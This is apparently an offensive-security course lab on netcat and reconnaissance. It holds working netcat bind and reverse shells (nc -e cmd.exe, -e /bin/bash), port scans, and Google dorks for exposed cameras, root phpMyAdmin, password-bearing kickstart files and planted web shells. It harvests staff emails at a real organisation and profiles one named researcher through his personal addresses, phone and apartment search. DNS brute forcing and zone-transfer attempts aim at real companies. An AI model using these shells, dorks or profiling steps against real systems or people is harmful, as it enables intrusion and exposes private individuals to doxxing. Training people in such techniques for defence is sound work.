Endian firewall
 
GnuPG
GnuPGGnuPG
GnuPG
 
Exemplo de Script Iptables
Exemplo de Script IptablesExemplo de Script Iptables
Exemplo de Script Iptables
 
Segurança Linux
Segurança LinuxSegurança Linux
Segurança Linux
 
RFID - Parte 2
RFID - Parte 2RFID - Parte 2
RFID - Parte 2
 
RFID - Parte 1
RFID - Parte 1RFID - Parte 1
RFID - Parte 1
 
Segurança em Aplicações Web
Segurança em Aplicações WebSegurança em Aplicações Web
Segurança em Aplicações Web
 
Anonimato na Web
Anonimato na Web Anonimato na Web
Anonimato na Web
 
Engenharia Social
Engenharia SocialEngenharia Social
Engenharia Social
 
Tutorial Maltego
Tutorial MaltegoTutorial Maltego
Tutorial Maltego
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5
 
Topologia lab
Topologia labTopologia lab
Topologia lab
 
Redes - Aula 2
Redes - Aula 2Redes - Aula 2
Redes - Aula 2
 

2 netcat enum-pub

  • 1. Laboratório do Curso de Segurança Ofensiva Netcat e Enumeração (Google Hacking, Whois e DNS) 1. NETCAT a) Ajuda root@bt:~/lab_bash-script# nc -h [v1.10-38] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp-data'). root@bt:~/lab_bash-script# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 1
c) Simple chat

On BackTrack:

nc -lvp 4444
On Windows XP SP2:

nc -nv 172.16.49.130 4444

Type anything on either machine and it shows up on the other.

d) Remote administration - bind shell

The listener executes /bin/bash for whoever connects. -e is the option the help text marks "[dangerous!!]", and it is why some netcat builds (OpenBSD's, for instance) ship without it: there is no authentication and no encryption, so anyone who can reach port 4444 gets the shell.

On the BT box on the external network:

root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...

On the Windows XP SP2 machine on the internal network:

C:\>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh
- Reverse shell with nc

Here the direction is reversed: the internal Windows host initiates the outbound connection and hands cmd.exe to whoever is listening. That is what gets through a firewall or NAT that blocks inbound connections to the internal network but lets outbound ones through.

On the BT box on the external network:

root@bt:~# nc -lvp 4444
listening on [any] 4444 ...

On the Windows XP SP2 machine on the internal network:

C:\>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open

Result on BT:

root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>hostname
hostname
CTP028

C:\>

The "inverse host lookup failed" line is only the listener trying to resolve 172.16.50.10 to a name (add -n to skip it); 1214 is the client's source port. Each command appears twice because cmd.exe, reading its input from a socket rather than a console, echoes the line before running it. (Version 5.2.3790 is the Windows Server 2003 / XP x64 build rather than XP SP2's 5.1.2600, so the box in this capture is not quite the one the heading describes.)

e) Port scan

The external BT box scanning the firewall (ports 21 to 30). With -z netcat only completes the TCP handshake and closes without sending data, -nvv prints one line per port, and -w 1 caps each attempt at one second; netcat walks the range from high to low. "Connection refused" means the port answered with a RST (closed); a port that merely timed out would be filtered. Every probe is a full connect, so it shows up in the target's logs like any other connection.

root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open
f) File transfer

On the external BT box, listen and write everything that arrives to a file:

root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224

On the Windows XP SP2 machine on the internal network, feed the file to netcat as standard input:

C:\>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open

Result:

root@bt:~# ls
Desktop
lab_bash-script
output.txt
rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#

The listener writes whatever the first client to connect sends it, with no authentication and no integrity check; compare a checksum (md5sum or sha1sum on each side) before trusting the received file. The sender may not exit by itself once stdin hits EOF: -q secs (on the Debian build) or -w secs makes it close after the last byte.
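The banner-grabbing and connect-scan steps above, condensed into a small Python script. This is an added example, not part of the original lab and not netcat's own code; it uses only the standard library. The two listeners it talks to are constructed fixtures on 127.0.0.1 that mimic the vsFTPd and Apache banners seen in the lab, so the script runs offline; point grab_banner and scan at a real host to use them for the lab. It also shows the distinction the lab only hints at: FTP, SSH and SMTP greet first, while HTTP stays silent until it is sent a request, which is why the lab typed "HEAD / HTTP/1.0" into the port 80 connection.

```python
import socket
import threading


def grab_banner(host, port, probe=None, timeout=2.0):
    """(state, banner) for one port: "open" plus whatever the service said (after an
    optional probe), "closed" on a RST, "filtered" on timeout or any other socket error."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if probe:
                # Services like HTTP say nothing until asked; FTP/SSH/SMTP speak first.
                s.sendall(probe)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""  # open but silent (e.g. HTTP without a probe)
        return "open", data.decode("latin-1", "replace").strip()
    except ConnectionRefusedError:
        return "closed", ""
    except OSError:  # connect timeout, unreachable network, ...
        return "filtered", ""


def scan(host, ports, timeout=1.0):
    """nc -z -w 1 equivalent: a full TCP connect per port, so every probe is logged
    by the target like any other connection. Returns {port: state}."""
    return {port: grab_banner(host, port, timeout=timeout)[0] for port in ports}


def http_server_header(banner):
    """Server: value from an HTTP response, or None if the banner is not HTTP."""
    for line in banner.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "server":
            return value.strip()
    return None


def fake_service(banner=None, reply=None):
    """Constructed fixture, not a real service: a loopback listener that greets with
    `banner` (if given) and, if `reply` is given, answers the client's first message."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listener closed
            with conn:
                try:
                    if banner:
                        conn.sendall(banner)
                    if reply:
                        conn.settimeout(2.0)
                        conn.recv(1024)
                        conn.sendall(reply)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def closed_port():
    """Constructed fixture: a loopback port that nothing listens on."""
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    ftp, ftp_port = fake_service(banner=b"220 (vsFTPd 2.3.0)\r\n")
    web, web_port = fake_service(reply=b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.16 (Ubuntu)\r\n\r\n")
    print(scan("127.0.0.1", [ftp_port, web_port, closed_port()]))
    print(grab_banner("127.0.0.1", ftp_port))
    state, banner = grab_banner("127.0.0.1", web_port, probe=b"HEAD / HTTP/1.0\r\n\r\n")
    print(state, http_server_header(banner))
```

Against a real target, a silent "open" from scan is the cue to retry grab_banner with a protocol-specific probe; the three states map onto netcat's "open", "Connection refused" and a timeout respectively.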
2. Google Search

Google search operators: look at the site: operator and the others. A hit only proves the page existed when Google crawled it; the host may have changed since.

site:offensive-security.com
    how many pages of the domain Google has indexed

site:www.offensive-security.com filetype:pdf
    PDF files only

site:aeoi.org.ir
    (about 21,800 pages at the time)

intitle:"Remote Desktop Web Connection" inurl:tsweb
    exposed Remote Desktop Web Connection pages

Google Hacking Database (GHDB): the catalogue of queries like the ones that follow.

Sites running Webmin:
inurl:10000 webmin

Sites running a VNC server:
intitle:"VNC viewer for java"
    VNC servers, e.g. http://okbk.myvnc.com:5800/

Print server:
intitle:"Network Print Server" filetype:shtm

SpeedStream router web interface:
intitle:"SpeedStream Router Management Interface"

Belkin setup page:
intitle:"Setup Home" "You will need * log in before * * change * settings"

Security cameras:
inurl:"viewerframe?mode=motion"
inurl:"ViewerFrame?Mode="
inurl:"view/index.shtml"
"please visit" intitle:"i-Catcher Console" Copyright "iCode"
intitle:"everfocus edsr applet"

Videoconferencing software:
intext:"Videoconference Management System" ext:htm

Open phpMyAdmin (no login, connected as root):
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"

Norton AntiVirus for Gateways:
inurl:"8003/Display?what="

MSN contact lists:
filetype:ctt "msn"

Kickstart files (the rootpw line in them carries the root password, in clear or as a hash):
#kickstart filetype:cfg
#kickstart filetype:cfg site:gov.br
CAREFUL!!!!!!

r57 PHP web shell (a backdoor left behind on web servers):
intitle:r57 shell filetype:php

Site with a planted backdoor, Antichat shell in the title:
intitle:"Antichat Shell" "disable functions"
3. Google Search Social

Search for aeoi.org.ir on its own in Google and look for e-mail addresses.

Use theHarvester.py (a Python script shipped with BT); -d is the domain, -l the number of results to pull, -b the data source:

root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google

[-] Searching in Google:
    Searching 0 results...
    Searching 100 results...
    Searching 200 results...

[+] Emails found:
------------------
hkazemian@aeoi.org.ir
sjahmadi@aeoi.org.ir
smshirvani@aeoi.org.ir
mmostaedi@aeoi.org.ir
AA37120067@aeoi.org.ir
jrahighi@aeoi.org.ir
sabolhosseini@aeoi.org.ir
mghannadi@aeoi.org.ir
rd@aeoi.org.ir

Search for hkazemian@aeoi.org.ir: he is a researcher and also has a Yahoo address, so search for hkazemian@yahoo.com.

See SPAG Zeolite, the company's address, a contact phone number and another address on Gmail; look for a photo; search for hosseinkazemian@gmail.com, where he is looking for an apartment; see the phone number.
4. Whois
Whois query

root@bt:~# whois checkpoint.com | more

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Server Name: CHECKPOINT.COM
   IP Address: 216.200.241.66
   Registrar: NETWORK SOLUTIONS, LLC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com/en_US/

   Domain Name: CHECKPOINT.COM
   Registrar: NETWORK SOLUTIONS, LLC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com/en_US/
   Name Server: NS2.CHECKPOINT.COM
   Name Server: NS6.CHECKPOINT.COM
   Name Server: NS8.CHECKPOINT.COM
   Name Server: NS9.CHECKPOINT.COM
   Status: clientTransferProhibited
   Updated Date: 30-may-2012
   Creation Date: 29-mar-1994
   Expiration Date: 30-mar-2018

Administrative Contact, Technical Contact:
   Admin, DNS  hostmaster@CHECKPOINT.COM
   Check Point Software Technologies Ltd.
   3A Jabotinsky St.
   Ramat-Gan, 52520
   IL
   +972-3-7534555 fax: +972-3-5759256

Record expires on 30-Mar-2018.
Record created on 29-Mar-1994.
Database last updated on 20-Jun-2012 22:30:44 EDT.

Domain servers in listed order:
   NS2.CHECKPOINT.COM   206.184.151.195
   NS6.CHECKPOINT.COM   194.29.32.199
   NS8.CHECKPOINT.COM   216.228.148.29
   NS9.CHECKPOINT.COM   194.29.38.64

Two answers are concatenated here: the registry (VeriSign) record, which names the registrar and its whois server, and the registrar's (Network Solutions) record, which the whois client fetched by following that referral and which adds the contact details. The first "Server Name: CHECKPOINT.COM" stanza is a name-server host object that happens to match the query, not the domain record. What matters for enumeration: the name servers, the contact address and phone prefix, the physical location, and the fact that ns6 (194.29.32.199) sits in a different netblock from www (216.200.241.66), which the DNS section follows up on.
Reverse whois lookup (by IP address)

root@bt:~# whois 216.200.241.66

#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 216.200.241.66"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=netref2
#

CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 - 216.200.255.255

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#

An address query goes to the regional registry (ARIN here, chosen by the client from the address), not to a domain registrar. The answer is a pair of nested allocations: a /28 (216.200.241.64 to .79) assigned to Check Point inside AboveNet's 216.200.0.0/16. That /28 is the range worth sweeping, which is exactly what the reverse DNS loop in section 5 does.
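The whois exchange itself, written out as an added example (not part of the original lab, and not the whois client's code): a raw port-43 query, the registry-to-registrar referral that the lab's output shows being followed, and a field parser that pulls the name servers out of the combined answer. It assumes only the standard library; whois.verisign-grs.com is the real .com/.net registry server, while the two sample responses are constructed, abridged from the output above, so that the script runs offline through fake_query. Pass query_fn=whois_query for a live lookup.

```python
import socket

# Constructed sample answers, abridged from the kind of output shown above:
# the registry stanza with its referral, then the registrar's record.
SAMPLE_REGISTRY = """\
   Domain Name: CHECKPOINT.COM
   Registrar: NETWORK SOLUTIONS, LLC.
   Whois Server: whois.networksolutions.com
   Name Server: NS2.CHECKPOINT.COM
   Name Server: NS6.CHECKPOINT.COM
   Status: clientTransferProhibited
"""
SAMPLE_REGISTRAR = """\
Domain Name: CHECKPOINT.COM
Registrant Organization: Check Point Software Technologies Ltd.
Name Server: NS2.CHECKPOINT.COM
Name Server: NS6.CHECKPOINT.COM
Name Server: NS8.CHECKPOINT.COM
Name Server: NS9.CHECKPOINT.COM
"""
FAKE_SERVERS = {
    "whois.verisign-grs.com": SAMPLE_REGISTRY,
    "whois.networksolutions.com": SAMPLE_REGISTRAR,
}


def fake_query(server, query):
    """Offline stand-in for whois_query (constructed fixture)."""
    return FAKE_SERVERS[server]


def whois_query(server, query, timeout=10.0):
    """One RFC 3912 exchange: send the query line, read until the server closes."""
    with socket.create_connection((server, 43), timeout=timeout) as s:
        s.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


def fields(text, name):
    """All values of a 'Key: value' field, matching the key case-insensitively."""
    out = []
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == name.lower() and value.strip():
            out.append(value.strip())
    return out


def whois(domain, root="whois.verisign-grs.com", query_fn=whois_query, max_hops=3):
    """Ask the .com/.net registry, then follow 'Whois Server:' referrals to the
    registrar. Returns [(server, raw text), ...] in the order queried."""
    hops = []
    server, query = root, f"domain {domain}"  # 'domain' keeps VeriSign to domain records only
    for _ in range(max_hops):
        text = query_fn(server, query)
        hops.append((server, text))
        referral = fields(text, "Whois Server") or fields(text, "Registrar WHOIS Server")
        if not referral or referral[0].lower() == server.lower():
            break
        server, query = referral[0], domain  # registrar servers take the bare name
    return hops


def name_servers(hops):
    """Lower-cased, de-duplicated NS list merged across hops; the registrar's copy is
    usually the complete one (the registry stanza above listed only two of four)."""
    seen = []
    for _, text in hops:
        for ns in fields(text, "Name Server"):
            if ns.lower() not in seen:
                seen.append(ns.lower())
    return seen


if __name__ == "__main__":
    hops = whois("checkpoint.com", query_fn=fake_query)
    for server, _ in hops:
        print("queried", server)
    print(name_servers(hops))
```

For an address rather than a domain, the same whois_query works against the regional registry, e.g. whois_query("whois.arin.net", "n 216.200.241.66"), which is the query ARIN told us it assumed above; the answer is free-form netblock text rather than Key: value lines, so fields() does not apply to it.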
5. DNS

Manual queries

root@bt:~# nslookup www.checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53

Non-authoritative answer:
Name:   www.checkpoint.com
Address: 216.200.241.66

Querying the domain's mail servers and name servers:

root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53

Non-authoritative answer:
checkpoint.com  mail exchanger = 12 sami.checkpoint.com.
checkpoint.com  mail exchanger = 15 usmail-as.zonelabs.com.

Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53

Non-authoritative answer:
checkpoint.com  nameserver = ns2.checkpoint.com.
checkpoint.com  nameserver = ns6.checkpoint.com.
checkpoint.com  nameserver = ns8.checkpoint.com.
checkpoint.com  nameserver = ns9.checkpoint.com.
checkpoint.com  nameserver = ns1.checkpoint.com.

Authoritative answers can be found from:
>

"Non-authoritative" means the answers came from the lab's recursive resolver (172.16.49.2) and its cache, not from checkpoint.com's own servers. The MX numbers (12, 15) are preferences: the lowest wins, so sami.checkpoint.com is the primary inbound mail host and the zonelabs.com one is the backup. DNS lists five name servers where whois listed four; the two sources are maintained separately and disagree often enough that both are worth checking.
DNS information gathering

1- Forward lookup brute force: guess valid host names

root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#

The second query is the check that makes brute forcing meaningful: a name that cannot exist must come back NXDOMAIN. If the zone has a wildcard record, every guess "resolves" and the word list tells you nothing until the wildcard's address is filtered out.

Use script_dns1.sh on BT for the brute force (raw output, no filtering):

root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com
done

Use script_dns2.sh for the brute force keeping only the "has address" lines:

root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address"
done
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#
Use script_dns3.sh for the brute force printing only the IPs (field 4 of each "has address" line; the grep also drops the "has IPv6 address" lines, whose address sits in field 5):

root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address" | cut -d" " -f4
done
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66

Most addresses fall in 194.29.32.x to 194.29.38.x, with a few in 208.185.174.x and 216.200.241.x: these are the netblocks to feed into the next step. The repeats (194.29.32.199 three times, www twice) are genuine: several names share one host, and the word list can contain the same name more than once.

2- Reverse lookup brute force: try reverse resolution across the netblock

root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.

The range 64 to 79 is the /28 that the ARIN lookup assigned to Check Point. The sweep names every host in it, and two entries (.64 and .79) still carry the provider's "available.above.net" placeholder. PTR records are set by whoever administers the reverse zone for the block, and they reveal host names (garmin, flanger, gould, darwin, ...) that no forward word list would have guessed.
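The three brute-force scripts and the reverse sweep above, reworked into one Python script. This is an added example, not the lab's own code; it uses only the standard library. It adds the two things the shell loops lack: the wildcard check (the "wwwwwwww.checkpoint.com" test, automated with random labels and subtracted from every hit) and de-duplication of the word list. The resolver is injectable: system_forward and system_reverse use the real system resolver, while fake_forward and fake_reverse are constructed stand-ins, built from a few of the records observed above plus an invented zone, wild.example, that answers for any label, so the script runs offline.

```python
import ipaddress
import random
import socket
import string


def system_forward(name):
    """IPv4 addresses for a name via the system resolver; empty set on NXDOMAIN."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)}
    except socket.gaierror:
        return set()


def system_reverse(ip):
    """PTR name for an address, or None when there is no reverse record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def wildcard_addresses(domain, forward=system_forward, tries=2):
    """The lab's 'wwwwwwww.checkpoint.com' check, automated: resolve random labels
    that cannot exist. Whatever they return is the zone's wildcard answer."""
    found = set()
    for _ in range(tries):
        label = "".join(random.choices(string.ascii_lowercase + string.digits, k=16))
        found |= forward(f"{label}.{domain}")
    return found


def forward_bruteforce(domain, wordlist, forward=system_forward):
    """script_dns2.sh with wildcard filtering and a de-duplicated word list.
    Returns {name: [addresses]} for names that resolve to something non-wildcard."""
    wild = wildcard_addresses(domain, forward)
    hits = {}
    for word in dict.fromkeys(w.strip().lower() for w in wordlist if w.strip()):
        name = f"{word}.{domain}"
        addrs = forward(name) - wild
        if addrs:
            hits[name] = sorted(addrs)
    return hits


def reverse_sweep(cidr, reverse=system_reverse):
    """The 'for ip in $(seq 64 79)' loop over a whole netblock, first and last address
    included (the allocation boundaries carried PTRs too). Returns {ip: ptr}."""
    ptrs = {}
    for ip in ipaddress.ip_network(cidr, strict=False):
        name = reverse(str(ip))
        if name:
            ptrs[str(ip)] = name
    return ptrs


# Constructed stand-in for the resolver so the script runs offline: a few records
# observed in the lab plus an invented zone, wild.example, with a wildcard record.
FAKE_A = {
    "www.checkpoint.com": {"216.200.241.66"},
    "ftp.checkpoint.com": {"194.29.38.25"},
    "ns1.checkpoint.com": {"208.185.174.140"},
    "www.wild.example": {"203.0.113.7"},
}
FAKE_PTR = {
    "216.200.241.65": "lata-gw.us.checkpoint.com",
    "216.200.241.66": "www.checkpoint.com",
}


def fake_forward(name):
    if name in FAKE_A:
        return set(FAKE_A[name])
    if name.endswith(".wild.example"):
        return {"203.0.113.9"}  # *.wild.example -> 203.0.113.9 (wildcard)
    return set()


def fake_reverse(ip):
    return FAKE_PTR.get(ip)


if __name__ == "__main__":
    words = ["www", "ftp", "ns1", "www", "wwwwwwww"]
    print(forward_bruteforce("checkpoint.com", words, forward=fake_forward))
    print(forward_bruteforce("wild.example", ["www", "mail"], forward=fake_forward))
    print(reverse_sweep("216.200.241.64/30", reverse=fake_reverse))
```

Against the wildcard zone, mail.wild.example is dropped because its only address is the wildcard's, while www.wild.example survives because it has its own record; with a real zone, swap in the defaults (or the dnsenum word list and the ARIN /28) and the same filtering applies.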
3- Zone transfer

root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:

Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.

host -l asks the named server for the whole zone (an AXFR). Here the server refused, which is the correct configuration: transfers should only be allowed to the zone's own secondaries. The "offensive-security.com.localdomain" line shows the resolver appending the lab machine's search suffix after the first attempt failed; a trailing dot on the domain (offensive-security.com.) stops that, and NOTAUTH only says that ns1.no-ip.com is not authoritative for the suffixed name.

------ try every name server (primary and secondaries): a secondary is sometimes left open even when the primary is locked down
------ do the same for aeoi.org.ir and estacio.br
Use /pentest/enumeration/dns/dnsenum:

root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt  dnsenum.pl  dns.txt  README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br

estacio.br                     5        IN    A        200.216.152.71

Name Servers:
ns1.estacio.br                 5        IN    A        200.216.152.249
ns2.estacio.br                 5        IN    A        200.216.152.250

Mail (MX) Servers:
Mail.Global.FrontBridge.com    5        IN    A        216.32.180.22
Mail.Global.FrontBridge.com    5        IN    A        216.32.181.178

estacio.br                     1800     IN    TXT
estacio.br                     1800     IN    A        200.216.152.71
1989163337.estacio.br          1800     IN    CNAME
mail._domainkey.estacio.br     14400    IN    TXT
agenda.estacio.br              1800     IN    A        200.216.152.71
agendaconselho.estacio.br      1800     IN    A        200.216.152.71
aluno.estacio.br               1800     IN    MX
biblioteca.estacio.br          1800     IN    CNAME
bibliotecasonora.estacio.br    1800     IN    A        200.216.152.90
blogdopresidente.estacio.br    1800     IN    A        200.216.152.149
bquestoes.estacio.br           1800     IN    A        200.216.152.63
adm.bquestoes.estacio.br       1800     IN    A        200.216.152.62
provas.bquestoes.estacio.br    1800     IN    A        200.216.152.63

(The record data for the TXT, CNAME and MX lines is not shown.) dnsenum looks up the host's A record, the NS and MX records, then attempts a zone transfer against each name server, and can also brute force subdomains with the bundled word lists (dns.txt, dns-big.txt). The record dump above, with its raw TTL column and names no word list would produce (1989163337.estacio.br, mail._domainkey.estacio.br), is what a successful transfer looks like: the whole zone handed over in one query, including the admin and exam hosts under bquestoes.estacio.br.